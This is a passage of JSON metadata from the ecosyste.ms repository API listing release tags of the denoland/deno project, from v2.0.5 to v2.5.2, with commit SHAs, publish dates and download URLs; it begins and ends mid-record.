/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms